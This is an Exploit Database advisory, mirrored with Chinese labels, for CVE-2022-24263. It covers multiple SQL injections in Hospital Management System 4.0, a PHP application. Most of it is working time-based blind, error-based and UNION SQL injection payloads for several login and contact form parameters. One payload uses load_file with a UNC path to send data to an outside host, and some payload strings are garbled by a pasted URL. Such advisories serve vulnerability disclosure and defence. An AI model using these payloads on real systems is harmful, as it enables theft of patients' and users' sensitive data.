Hospital Management System 4.0 – ‘multiple’ SQL Injection

• Exploit Database
• 15 阅读

• 作者： nu11secur1ty
  日期： 2022-02-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50718/

• # Title: Hospital Management System 4.0 - 'multiple' SQL Injection
  # Author: nu11secur1ty
  # Date: 02.06.2022
  # Vendor: https://github.com/kishan0725
  # Software: https://github.com/kishan0725/Hospital-Management-System
  # CVE-2022-24263
  
  
  ## Description:
  The Hospital Management System v4.0 is suffering from Multiple
  SQL-Injections via three parameters in function.php,contact.php, and
  func3.php applications.
  The attacker can be receiving the all information from the system by
  using this vulnerability, and also the malicious actor can use
  sensitive information from the customers of this system.
  WARNING: If this is in some external domain, or some subdomain, or
  internal, this will be extremely dangerous!
  Status: CRITICAL
  
  
  [+] Payloads:
  
  ---
  Parameter: txtName (POST)
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: txtName=821761' AND (SELECT 9346 FROM
  (SELECT(SLEEP(3)))HJGv) AND
  'xkCZ'='xkCZ&txtEmail=xstxPhYW@https://github.com/kishan0725/Hospital-Management-System&txtPhone=813-439-23'+(select
  load_file('\\\\k0lnu24kl14z5bxcoo5tj7z4bvho5fz3q6ey1qpf.https://github.com/kishan0725/Hospital-Management-System\\hgq'))+'&btnSubmit=Send
  Message&txtMsg=441931
  ---
  
  -------------------------------------------
  
  ---
  Parameter: #1* ((custom) POST)
  Type: error-based
  Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
  Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2936)
  OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN
  1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING
  MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login
  
  Type: UNION query
  Title: MySQL UNION query (random number) - 1 column
  Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2730)
  UNION ALL SELECT
  8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login
  ---
  
  -------------------------------------------
  
  ---
  Parameter: #1* ((custom) POST)
  Type: error-based
  Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
  Payload: username3=CHnDaCTc'+(select-2423) OR 1 GROUP BY
  CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0
  END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING
  MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login
  
  Type: UNION query
  Title: MySQL UNION query (random number) - 1 column
  Payload: username3=CHnDaCTc'+(select-3282) UNION ALL SELECT
  CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login
  ---
  
  ## Reproduce:
  https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-24263